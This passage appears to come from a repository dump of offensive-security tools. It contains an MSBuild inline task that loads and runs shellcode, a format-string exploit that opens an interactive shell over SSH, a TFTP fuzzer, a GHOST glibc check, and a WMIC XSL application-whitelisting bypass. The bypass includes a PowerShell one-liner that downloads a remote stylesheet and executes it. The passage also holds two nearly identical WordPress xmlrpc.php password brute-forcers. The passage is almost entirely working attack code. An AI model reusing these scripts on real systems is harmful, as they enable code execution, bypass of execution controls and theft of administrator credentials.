33 |             private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
34 |             UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
35 |           [DllImport("kernel32")]
36 |             private static extern IntPtr CreateThread(            
37 | 				UInt32 lpThreadAttributes,
38 | 				UInt32 dwStackSize,
39 | 				UInt32 lpStartAddress,
40 | 				IntPtr param,
41 | 				UInt32 dwCreationFlags,
42 | 				ref UInt32 lpThreadId           
43 |             );
44 |           [DllImport("kernel32")]
45 |             private static extern UInt32 WaitForSingleObject(           
46 | 				IntPtr hHandle,
47 | 				UInt32 dwMilliseconds
48 |             );          
49 |           public override bool Execute(){
50 | 			  
51 | 		// Adapt here buffer length + shellcode
52 | 		byte[] Sc = new byte[351] {0xb0,0x0b,0x4d,0xad,0x.....};
53 | 		UInt32 funcAddr = VirtualAlloc(0, (UInt32)Sc.Length,
54 | 		MEM_COMMIT, PAGE_EXECUTE_READWRITE);
55 | 		Marshal.Copy(Sc, 0, (IntPtr)(funcAddr), Sc.Length);
56 | 		IntPtr hThread = IntPtr.Zero;
57 | 		UInt32 threadId = 0;
58 | 		IntPtr pinfo = IntPtr.Zero;
59 | 		hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
60 | 		WaitForSingleObject(hThread, 0xFFFFFFFF);
61 | 		return true;
62 |           } 
63 |         }     
64 |       ]]> // close CDATA[]
65 |       </Code>
66 |     </Task>
67 |   </UsingTask>
68 | </Project>
69 | 


--------------------------------------------------------------------------------
/ShellcodeExtractor.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | 
 3 | from pwn import *
 4 | 
 5 | ShellcodeFile = open("b64_extract.bin","r+") 
 6 | Extracted = ShellcodeFile.readline();
 7 | 
 8 | print(disasm(unhex(Extracted), byte=0, arch='amd64', offset = 0))
 9 | print "[+] Hex value: "+ Extracted
10 | 


--------------------------------------------------------------------------------
/TFTP-Fuzzer.rb:
--------------------------------------------------------------------------------
 1 | #Metasploit
 2 | 
 3 | require 'msf/core'
 4 | 
 5 | class MetasploitModule < Msf::Auxiliary
 6 |   include Msf::Auxiliary::Fuzzer
 7 |   include Msf::Exploit::Remote::Udp
 8 |   include Msf::Auxiliary::Scanner
 9 | 
10 | 	def initialize
11 | 		super(
12 | 			'Name'        => 'Basic TFTP Fuzzer',
13 | 			'Description' => %q(
14 | 			A simplistic fuzzer for TFTP.
15 | 			It fuzz the filename string parameter (could be quickly and easily adapted).
16 | 		),
17 | 		'Author'      => 'kmkz - Twitter: kmkz_security',
18 | 		'License'     => MSF_LICENSE
19 | 	)
20 | 	register_options([
21 | 		Opt::RPORT(69),
22 | 	])
23 | 	end
24 | 
25 |         def run_host(ip)
26 |                 # Create an unbound UDP socket
27 |                 udp_sock = Rex::Socket::Udp.create(
28 |                         'Context'   =>
29 |                                 {
30 |                                         'Msf'        => framework,
31 |                                         'MsfExploit' => self,
32 |                                 }
33 |                 )
34 |                 count = 100  # Set an initial count
35 |                 while count < 5000  # While the count is under 5000 run
36 | 			
37 |                         evil = "A" * count  # Set a number of "A"s equal to count
38 | 			mode = "netascii"
39 |                         pkt = "\x00\x02" + evil + "\x00" + mode + "\x00"  # Define the payload
40 | 	
41 |                         udp_sock.sendto(pkt, ip, datastore['RPORT'])  # Send the packet
42 | 			
43 |                         print_status("Sending A x #{count} as payload...")  # Status update
44 |                         resp = udp_sock.get(1)  # Capture the response
45 |                         count += 100  # Increase count by 10, and loop
46 |                 end
47 |         end
48 | end
49 | 


--------------------------------------------------------------------------------
/binjitsuFS.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | 
 3 | from pwn import *
 4 | 
 5 | # Binary name, var to overwrite & data to overwrite:
 6 | check=0xbffffb00
 7 | overwrite=0xdeadbeef
 8 | binary='./binfile'
 9 | 
10 | # SSH connexion:
11 | ssh =  ssh(  
12 | 		host='target.org',
13 | 		port= 222,
14 | 		user='myuser',
15 | 		password='mypasswd')
16 | 
17 | # Get offset:
18 | def exec_fmt(payload):
19 | 	process = ssh.process([binary, payload])
20 | 	ret= process.recvall()
21 | 	return ret[ret.find('output=[')+5:ret.find("]\nbye!") ]
22 | 
23 | autofmt = FmtStr(exec_fmt)
24 | offset = autofmt.offset
25 | 
26 | 
27 | # Build payload:
28 | def send_fmt_payload(payload):
29 | 	print repr(payload)
30 | 
31 | fspayload= fmtstr_payload(offset, {check: overwrite}, write_size='byte')
32 | 
33 | # Sending payload and launch an interactive shell:
34 | exploitation= ssh.process([binary, fspayload])
35 | exploitation.interactive()
36 | 


--------------------------------------------------------------------------------
/poc_cve_2015_0235.c:
--------------------------------------------------------------------------------
 1 | # include <netdb.h>
 2 | # include <stdio.h>
 3 | # include <stdlib.h>
 4 | # include <string.h>
 5 | # include <errno.h>
 6 | 
 7 | # define CANARY "Is_it_vulnerable?"
 8 | 
 9 | /*
10 | *************************************************************************************************
11 | Publication date: 27/01/2015
12 | 
13 | Vulnerability impact: High
14 | 
15 | Type: Heap based buffer overflow in  gethstbyname() / gethostbyname2()  function via libc
16 | 
17 | Details: http://www.openwall.com/lists/oss-security/2015/01/27/9
18 | 
19 | Other way to detect your glibc version: ldd --version
20 | *************************************************************************************************
21 | */
22 | 
23 | struct {
24 | 	char buffer[1024];
25 | 	char canary[sizeof(CANARY)];
26 | } temp = { "buffer", CANARY };
27 | 
28 | int main(void) {
29 | 	struct hostent resbuf;
30 | 	struct hostent *result;
31 | 	int herrno;
32 | 	int retval;
33 | 
34 | 	printf("GLIBC CVE-2015-0235 (Ghost) PoC\n\nIt permit you to know if you're vulnerable to the CVE and you libc version is...\n");
35 | 	size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
36 | 	
37 | 	char name[sizeof(temp.buffer)];
38 | 	memset(name, '0', len);
39 | 	name[len] = '\0';
40 | 	
41 | 	retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);
42 | 
43 | 	if (strcmp(temp.canary, CANARY) != 0) {
44 | 		puts("Is vulnerable ! \n");
45 | 		exit(EXIT_SUCCESS);
46 | 	}
47 | 	if (retval == ERANGE) {
48 | 		puts("Is not vulnerable \n");
49 | 		exit(EXIT_SUCCESS);
50 | 	}
51 | puts("Don't know...good luck \n");
52 | return(1);
53 | }


--------------------------------------------------------------------------------
/wmic-poc.xsl:
--------------------------------------------------------------------------------
 1 | <xsl:stylesheet  xmlns:xsl="http://www.w3.org/TR/WD-xsl">
 2 | <!--
 3 | Original publication:
 4 | https://subt0x11.blogspot.lu/2018/04/wmicexe-whitelisting-bypass-hacking.html
 5 | 
 6 | Microsoft documentation:
 7 | https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
 8 | 
 9 | Use-case/main objective:
10 | - Windows Script Host is disabled or blocked
11 | unconstrained script host bypass for Windows Defender Application Control 
12 | WMIC can invoke XSL (eXtensible Stylesheet Language) scripts, either locally or from a URL.
13 | 
14 | Proof of concept based on C:\Windows\System32\wbem\texttable.xsl
15 | 
16 | PoC examples:
17 | wmic process LIST /FORMAT:"C:\Users\WMI\poc-wmic.xsl"
18 | 
19 | OR:
20 | wmic process get brief /format:"C:\Users\WMI\poc-wmic.xsl" 
21 | wmic process LIST /FORMAT:"\\127.0.0.1\c$\Users\WMI\poc-wmic.xsl"
22 | 
23 | #cat poc-wmic.xsl:
24 |                   <?xml version='1.0'?>
25 |                     <stylesheet
26 |                     xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
27 |                     xmlns:user="placeholder"
28 |                     version="1.0">
29 |                       <output method="text"/>
30 |                         <ms:script implements-prefix="user" language="JScript">
31 |                           <![CDATA[
32 |                             var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /k echo 'Tapz!'");
33 |                           ]]> </ms:script>
34 |                   </stylesheet>
35 | 
36 | 
37 | Remote File example:
38 | wmic os get /FORMAT:"https://example.com/evil.xsl"
39 | 
40 | Basic PoC payload using Powershell oneliner + proxy authentication (from IE config.):
41 | PS C:\Users\pwnd\Desktop> powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('192.168.13.37/test2.xsl') -outfile test2.xsl";$cmd="wmic os get /format:'test2.xsl'"; iex $cmd
42 | 
43 | Post-exploit Project that already implement this king of lateral movement:
44 | https://github.com/zerosum0x0/koadic
45 | -->
46 | 
47 | <xsl:script language="VBScript"><![CDATA[
48 | Set shl = CreateObject("Wscript.Shell")  
49 | Call shl.Run("""calc.exe""")  
50 |   ]]></xsl:script>
51 | <xsl:template match="/"><xsl:apply-templates select="//RESULTS"/><xsl:apply-templates select="//INSTANCE"/><xsl:eval no-entities="true" language="VBScript">DisplayValues(this)</xsl:eval></xsl:template>
52 | <xsl:template match="RESULTS"><xsl:eval no-entities="true" language="VBScript">CountResults(this)</xsl:eval></xsl:template>
53 | <xsl:template match="INSTANCE"><xsl:eval language="VBScript">GotInstance()</xsl:eval><xsl:apply-templates select="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"/></xsl:template>
54 | </xsl:stylesheet>
55 | 


--------------------------------------------------------------------------------
/wp-xmlrpc-user-bf.pl:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/perl -wU
  2 | 
  3 | # WP PingBack/Amplification attack password Brute Forcer (DIIIIRTY ! )
  4 | 
  5 | use 5.010;
  6 | use IO::File;
  7 | use Data::Dumper;
  8 | use Term::ANSIColor;
  9 | 
 10 | my @Tab=();
 11 | my $Handle = IO::File->new("hosts.txt", "r") || die $!;
 12 | 
 13 | print (colored"\n  [+] ",'bold green');
 14 | say "Start to send requests...\n";
 15 | 
 16 | while (my $Reading = $Handle->getline()) {
 17 | 	
 18 | 		chomp($Reading);
 19 | 		my $Current=$Reading;
 20 | 		print (colored"[-] ",'yellow');
 21 | 		say "Requesting $Current";
 22 | 
 23 | 		my $Handle2 = IO::File->new("/usr/share/wordlists/rockyou.txt", "r") || die $!;
 24 | 		my @BF=();
 25 | 
 26 | 		while (my $pass = $Handle2->getline()) {
 27 | 			chomp($pass);
 28 | 
 29 | 			@BF='
 30 | 				<?xml version="1.0" encoding="iso-8859-1"?>
 31 | 				<methodCall>
 32 | 				<methodName>wp.getUsersBlogs</methodName>
 33 | 				<params>
 34 | 				<param>
 35 | 				<value>
 36 | 					<string>admin</string>
 37 | 				</value>
 38 | 				</param>
 39 | 				<param>
 40 | 				<value>
 41 | 					<string>'.$pass.'</string>
 42 | 				</value>
 43 | 				</param>
 44 | 				</params>
 45 | 				</methodCall>
 46 | 				';
 47 | 				
 48 | 			print (colored"\n  [+] ",'bold yellow');
 49 | 			say "Testing Authentication using: $pass as password...\n";
 50 | 		
 51 | 			my $Request='curl --connect-timeout 5 --data @test.txt https://'.$Current.'/xmlrpc.php 2>/dev/null';
 52 | 			my $ForTab=`$Request`;
 53 | 			push(@Tab,$ForTab);
 54 | 			
 55 | 			print (colored"\n  [+] ",'bold green');
 56 | 			say "Parsing output to find RPC Pingback response...";
 57 | 			
 58 | 			foreach my$Output(@Tab){
 59 | 
 60 | 				if ($Output=~/isadmin/i){
 61 | 					say colored"[*] Password $pass found using this payload: $Output !",'bold green';
 62 | 					unlink("test.txt");
 63 | 					exit;
 64 | 				}
 65 | 				else{
 66 | 					print (colored"\n  [+] ",'bold yellow');
 67 | 					say "Authentication failed ($pass); trying next password\n";
 68 | 				
 69 | 					foreach my $lol(@BF){
 70 | 	
 71 | 						my $output = new IO::File(">test.txt");
 72 | 						print $output  $lol;
 73 | 						$output->close;
 74 | 					}
 75 | 				}	
 76 | 			}
 77 | 		}
 78 | }
 79 | unlink("test.txt");
 80 | 
 81 | print (colored"\n  [?] ",'bold blue');
 82 | say "[-] Hope that you find something...";
 83 | 
 84 | =info
 85 | test.txt:
 86 | 
 87 | 	<?xml version="1.0" encoding="iso-8859-1"?>
 88 | 	<methodCall>
 89 | 	<methodName>wp.getUsersBlogs</methodName>
 90 | 	<params>
 91 | 	<param>
 92 | 	<value>
 93 | 		<string>admin</string>
 94 | 	</value>
 95 | 	</param>
 96 | 	<param>
 97 | 	<value>
 98 | 		<string>password</string>
 99 | 	</value>
100 | 	</param>
101 | 	</params>
102 | 	</methodCall>
103 | =cut
104 | 


--------------------------------------------------------------------------------
/xmlrpc.pl:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/perl -wU
  2 | 
  3 | # WP PingBack/apmification attack password Brute Forcer (DIIIIRTY ! )
  4 | 
  5 | use 5.010;
  6 | use IO::File;
  7 | use Data::Dumper;
  8 | use Term::ANSIColor;
  9 | 
 10 | my @Tab=();
 11 | my $Handle = IO::File->new("hosts.txt", "r") || die $!;
 12 | 
 13 | print (colored"\n  [+] ",'bold green');
 14 | say "Start to send requests...\n";
 15 | 
 16 | while (my $Reading = $Handle->getline()) {
 17 | 	
 18 | 		chomp($Reading);
 19 | 		my $Current=$Reading;
 20 | 		print (colored"[-] ",'yellow');
 21 | 		say "Requesting $Current";
 22 | 
 23 | 		my $Handle2 = IO::File->new("/usr/share/wordlists/rockyou.txt", "r") || die $!;
 24 | 		my @BF=();
 25 | 
 26 | 		while (my $pass = $Handle2->getline()) {
 27 | 			chomp($pass);
 28 | 
 29 | 			@BF='
 30 | 				<?xml version="1.0" encoding="iso-8859-1"?>
 31 | 				<methodCall>
 32 | 				<methodName>wp.getUsersBlogs</methodName>
 33 | 				<params>
 34 | 				<param>
 35 | 				<value>
 36 | 					<string>admin</string>
 37 | 				</value>
 38 | 				</param>
 39 | 				<param>
 40 | 				<value>
 41 | 					<string>'.$pass.'</string>
 42 | 				</value>
 43 | 				</param>
 44 | 				</params>
 45 | 				</methodCall>
 46 | 				';
 47 | 				
 48 | 			print (colored"\n  [+] ",'bold yellow');
 49 | 			say "Testing Authentication using: $pass as password...\n";
 50 | 		
 51 | 			my $Request='curl --connect-timeout 5 --data @test.txt https://'.$Current.'/xmlrpc.php 2>/dev/null';
 52 | 			my $ForTab=`$Request`;
 53 | 			push(@Tab,$ForTab);
 54 | 			
 55 | 			print (colored"\n  [+] ",'bold green');
 56 | 			say "Parsing output to find RPC Pingback response...";
 57 | 			
 58 | 			foreach my$Output(@Tab){
 59 | 
 60 | 				if ($Output=~/isadmin/i){
 61 | 					say colored"[*] Password $pass found using this payload: $Output !",'bold green';
 62 | 					unlink("test.txt");
 63 | 					exit;
 64 | 				}
 65 | 				else{
 66 | 				print (colored"\n  [+] ",'bold yellow');
 67 | 				say "Authentication failed ($pass); trying next password\n";
 68 | 				
 69 | 				foreach my $lol(@BF){
 70 | 	
 71 | 					my $output = new IO::File(">test.txt");
 72 | 					print $output  $lol;
 73 | 					$output->close;
 74 | 					}
 75 | 				}	
 76 | 
 77 | 			}
 78 | 		}
 79 | }
 80 | 
 81 | unlink("test.txt");
 82 | 
 83 | CLOSE:
 84 | print (colored"\n  [?] ",'bold blue');
 85 | say "[-] Hope that you find something...";
 86 | 
 87 | 
 88 | 
 89 | 
 90 | =info
 91 | test.txt:
 92 | 
 93 | 	<?xml version="1.0" encoding="iso-8859-1"?>
 94 | 	<methodCall>
 95 | 	<methodName>wp.getUsersBlogs</methodName>
 96 | 	<params>
 97 | 	<param>
 98 | 	<value>
 99 | 		<string>admin</string>
100 | 	</value>
101 | 	</param>
102 | 	<param>
103 | 	<value>
104 | 		<string>password</string>
105 | 	</value>
106 | 	</param>
107 | 	</params>
108 | 	</methodCall>
109 | =cut
110 | 


--------------------------------------------------------------------------------